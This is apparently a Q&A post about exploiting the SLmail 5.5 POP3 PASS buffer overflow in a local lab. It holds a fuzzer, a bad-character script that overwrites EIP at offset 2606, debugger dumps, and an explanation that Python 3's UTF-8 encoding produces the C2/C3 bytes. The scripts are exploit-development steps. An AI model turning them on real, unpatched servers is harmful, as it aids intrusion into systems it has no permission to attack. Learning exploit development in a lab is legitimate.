
What are C2 & C3 characters in SLmail bad characters?

Reverse Engineering Asked by Wolf on December 5, 2020

According to this site, there are 3 bad characters in SLmail v5.5

https://www.whitelist1.com/2016/11/xstack-overflow-1-exploiting-slmail.html

To sum it up, there are 3 bad characters that are interpreted
literally by the compiler; their immediate effect consists of
truncating the normal execution of the program. Once removed, the
buffer is executed correctly.

0x00 = Null Byte = terminates a string copy operation.
0x0D = Carriage Return = resets to the beginning of a line of text.
0x0A = Line Feed = advances by the space of one line.

However, I don’t get a similar result after removing these 3 characters.

Here is the screenshot of my Immunity. Notice that there are a lot of C2 & C3 characters in it.


Registers

EAX 00000000
ECX 01C89EF0 ASCII "20/10/03 00:25:07 P3-0001: Illegal command 0(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ESP 01C8A154
EBP 41414141
EIP 42424242

Stack

01C8A148   41414141  AAAA
01C8A14C   41414141  AAAA
01C8A150   42424242  BBBB
01C8A154   04030201  
01C8A158   08070605  
01C8A15C   0E0C0B09  ..

Hex dump

01C8A134  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01C8A144  41 41 41 41 41 41 41 41 41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
01C8A154  01 02 03 04 05 06 07 08 09 0B 0C 0E 0F 10 11 12  ..
01C8A164  13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22   !"
01C8A174  23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32  #$%&'()*+,-./012
01C8A184  33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42  3456789:;<=>?@AB
01C8A194  43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52  CDEFGHIJKLMNOPQR
01C8A1A4  53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 62  STUVWXYZ[]^_`ab
01C8A1B4  63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72  cdefghijklmnopqr
01C8A1C4  73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F C2 80 C2  stuvwxyz{|}~€Â
01C8A1D4  81 C2 82 C2 83 C2 84 C2 85 C2 86 C2 87 C2 88 C2  ‚ƒ„…†‡ˆÂ
01C8A1E4  89 C2 8A C2 8B C2 8C C2 8D C2 8E C2 8F C2 90 C2  ‰ÂŠÂ‹ÂŒÂÂŽÂÂÂ
01C8A1F4  91 C2 92 C2 93 C2 94 C2 95 C2 96 C2 97 C2 98 C2  ‘’“”•–—˜Â
01C8A204  99 C2 9A C2 9B C2 9C C2 9D C2 9E C2 9F C2 A0 C2  ™ÂšÂ›ÂœÂžŸ Â
01C8A214  A1 C2 A2 C2 A3 C2 A4 C2 A5 C2 A6 C2 A7 C2 A8 C2  ¡Â¢Â£Â¤Â¥Â¦Â§Â¨Â
01C8A224  A9 C2 AA C2 AB C2 AC C2 AD C2 AE C2 AF C2 B0 C2  ©ÂªÂ«Â¬Â­Â®Â¯Â°Â
01C8A234  B1 C2 B2 C2 B3 C2 B4 C2 B5 C2 B6 C2 B7 C2 B8 C2  ±Â²Â³Â´ÂµÂ¶Â·Â¸Â
01C8A244  B9 C2 BA C2 BB C2 BC C2 BD C2 BE C2 BF C3 80 C3  ¹ÂºÂ»Â¼Â½Â¾Â¿Ã€Ã
01C8A254  81 C3 82 C3 83 C3 84 C3 85 C3 86 C3 87 C3 88 C3  ÂÃÄÅÆÇÈÃ
01C8A264  89 C3 8A C3 8B C3 8C C3 8D C3 8E C3 8F C3 90 C3  ‰ÃŠÃ‹ÃŒÃÃŽÃÃÃ
01C8A274  91 C3 92 C3 93 C3 94 C3 95 C3 96 C3 97 C3 98 C3  ‘ÒÓÔÕÖ×ØÃ
01C8A284  99 C3 9A C3 9B C3 9C C3 9D C3 9E C3 9F C3 A0 C3  ™ÃšÃ›ÃœÃÞßàÃ
01C8A294  A1 C3 A2 C3 A3 C3 A4 C3 A5 C3 A6 C3 A7 C3 A8 C3  ¡Ã¢Ã£Ã¤Ã¥Ã¦Ã§Ã¨Ã
01C8A2A4  A9 C3 AA C3 AB C3 AC C3 AD C3 AE C3 AF C3 B0 C3  ©ÃªÃ«Ã¬Ã­Ã®Ã¯Ã°Ã
01C8A2B4  B1 C3 B2 C3 B3 C3 B4 C3 B5 C3 B6 C3 B7 C3 B8 C3  ±Ã²Ã³Ã´ÃµÃ¶Ã·Ã¸Ã
01C8A2C4  B9 C3 BA C3 BB C3 BC C3 BD C3 BE C3 BF 29 20 69  ¹ÃºÃ»Ã¼Ã½Ã¾Ã¿) i
01C8A2D4  6E 20 73 74 61 74 65 20 35 00 00 00 00 00 00 00  n state 5.......
01C8A2E4  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
01C8A2F4  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

Update

I was using this code as a reference.

https://github.com/coffeecoco/slmail/blob/master/pop3-pass-fuzz.py

But since that was written for Python 2 and I’m using Python 3, I’ve modified the code a little bit as they’re not really compatible with each other.

Script 1: a fuzzer

#!/usr/bin/python

import socket

# Build payloads of increasing length: 1, 100, 300, 500, ... bytes
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

for string in buffer:
    print("Fuzzing PASS with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 110))
    s.recv(1024)                                     # server banner
    s.send(b'USER wolf\r\n')
    s.recv(1024)                                     # response to USER
    s.send(b'PASS ' + string.encode() + b'\r\n')     # Python 3: the str must be encoded before it can be sent
    s.send(b'QUIT\r\n')
    s.close()                                        # close every connection, not only the last one

Script 2: to identify bad characters

The screenshot above was generated with this code.

#!/usr/bin/python

import socket

# \x00, \x0a, and \x0d have been removed
badCharacters = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# 2606 bytes of padding, 4 bytes that land in EIP, then the byte range
string = "A" * 2606 + "B" * 4 + badCharacters

print("Fuzzing PASS with %s bytes" % len(string))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 110))
s.recv(1024)                                     # server banner
s.send(b'USER wolf\r\n')
s.recv(1024)                                     # response to USER
s.send(b'PASS ' + string.encode() + b'\r\n')     # Python 3: the str must be encoded before it can be sent
s.send(b'QUIT\r\n')
s.close()
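As an added example (not code from the question or from the linked scripts), the following Python 3 check parses the hex-dump lines from the Immunity output above, rebuilds the byte range Script 2 meant to send, and tests whether what landed on the stack is that raw range or its UTF-8 encoding. The dump lines are copied from the question with the ASCII column dropped; the function names and the `EXCLUDED` constant are this example's own.

```python
"""Added example: why a Python 3 port of a bad-character script can put C2/C3
bytes in memory. Parses the hex dump from the question and compares it with
the byte range the script intended to send."""

# The three byte values the posted script already leaves out (assumption:
# this matches the x00/x0a/x0d removal in Script 2).
EXCLUDED = frozenset({0x00, 0x0A, 0x0D})

# Hex-dump lines from the question, starting at ESP (01C8A154); ASCII column removed.
DUMP = """\
01C8A154  01 02 03 04 05 06 07 08 09 0B 0C 0E 0F 10 11 12
01C8A164  13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22
01C8A174  23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32
01C8A184  33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42
01C8A194  43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52
01C8A1A4  53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 62
01C8A1B4  63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72
01C8A1C4  73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F C2 80 C2
01C8A1D4  81 C2 82 C2 83 C2 84 C2 85 C2 86 C2 87 C2 88 C2
01C8A1E4  89 C2 8A C2 8B C2 8C C2 8D C2 8E C2 8F C2 90 C2
01C8A1F4  91 C2 92 C2 93 C2 94 C2 95 C2 96 C2 97 C2 98 C2
01C8A204  99 C2 9A C2 9B C2 9C C2 9D C2 9E C2 9F C2 A0 C2
01C8A214  A1 C2 A2 C2 A3 C2 A4 C2 A5 C2 A6 C2 A7 C2 A8 C2
01C8A224  A9 C2 AA C2 AB C2 AC C2 AD C2 AE C2 AF C2 B0 C2
01C8A234  B1 C2 B2 C2 B3 C2 B4 C2 B5 C2 B6 C2 B7 C2 B8 C2
01C8A244  B9 C2 BA C2 BB C2 BC C2 BD C2 BE C2 BF C3 80 C3
01C8A254  81 C3 82 C3 83 C3 84 C3 85 C3 86 C3 87 C3 88 C3
01C8A264  89 C3 8A C3 8B C3 8C C3 8D C3 8E C3 8F C3 90 C3
01C8A274  91 C3 92 C3 93 C3 94 C3 95 C3 96 C3 97 C3 98 C3
01C8A284  99 C3 9A C3 9B C3 9C C3 9D C3 9E C3 9F C3 A0 C3
01C8A294  A1 C3 A2 C3 A3 C3 A4 C3 A5 C3 A6 C3 A7 C3 A8 C3
01C8A2A4  A9 C3 AA C3 AB C3 AC C3 AD C3 AE C3 AF C3 B0 C3
01C8A2B4  B1 C3 B2 C3 B3 C3 B4 C3 B5 C3 B6 C3 B7 C3 B8 C3
01C8A2C4  B9 C3 BA C3 BB C3 BC C3 BD C3 BE C3 BF 29 20 69
"""


def parse_hex_dump(dump: str) -> bytes:
    """Parse debugger-style lines 'ADDR  XX XX ... XX [ascii]'.
    Only the 16 byte tokens after the address are read; an ASCII column, if present, is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        parts = line.split()
        if not parts:
            continue
        out.extend(int(tok, 16) for tok in parts[1:17])
    return bytes(out)


def intended_code_points(excluded=EXCLUDED) -> str:
    """What Script 2 builds: a str of code points 0x01..0xFF minus the excluded ones.
    A str holds code points, not bytes; it still has to be encoded to go on the wire."""
    return "".join(chr(v) for v in range(1, 256) if v not in excluded)


def intended_bytes(excluded=EXCLUDED) -> bytes:
    """The same range built as raw bytes from the start, so no encoding step is needed."""
    return bytes(v for v in range(1, 256) if v not in excluded)


def utf8_of(s: str) -> bytes:
    """str.encode() with no argument is UTF-8: U+0080..U+00BF become C2 xx and
    U+00C0..U+00FF become C3 xx, so every code point >= 0x80 turns into two bytes."""
    return s.encode()


def first_divergence(observed: bytes, expected: bytes) -> int:
    """Index of the first byte where observed differs from expected; -1 if expected is a prefix."""
    for i, (a, b) in enumerate(zip(observed, expected)):
        if a != b:
            return i
    return -1 if len(observed) >= len(expected) else len(observed)


def classify_dump(observed: bytes, excluded=EXCLUDED) -> dict:
    """Report whether memory holds the raw range or its UTF-8 expansion, where the raw
    range first breaks, and how many C2/C3 lead bytes the expansion introduced."""
    raw = intended_bytes(excluded)
    expanded = utf8_of(intended_code_points(excluded))
    return {
        "raw_range_present": observed.startswith(raw),
        "utf8_expansion_present": observed.startswith(expanded),
        "raw_breaks_at": first_divergence(observed, raw),
        "raw_len": len(raw),
        "expanded_len": len(expanded),
        "c2_count": observed.count(0xC2),
        "c3_count": observed.count(0xC3),
    }


if __name__ == "__main__":
    for key, value in classify_dump(parse_hex_dump(DUMP)).items():
        print("%-24s %s" % (key, value))
```

Run stand-alone, the report shows the raw range breaking at offset 125 (the first byte >= 0x80) and the UTF-8 expansion matching the dump exactly: 253 intended bytes became 381 bytes in memory, with 64 C2 and 64 C3 lead bytes that the server never received as single bytes. The practical consequence is that a bad-character test written in Python 3 should build its sequence as `bytes` (as `intended_bytes` does) rather than as a `str` that is encoded later, otherwise every value from 0x80 upward is misreported.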
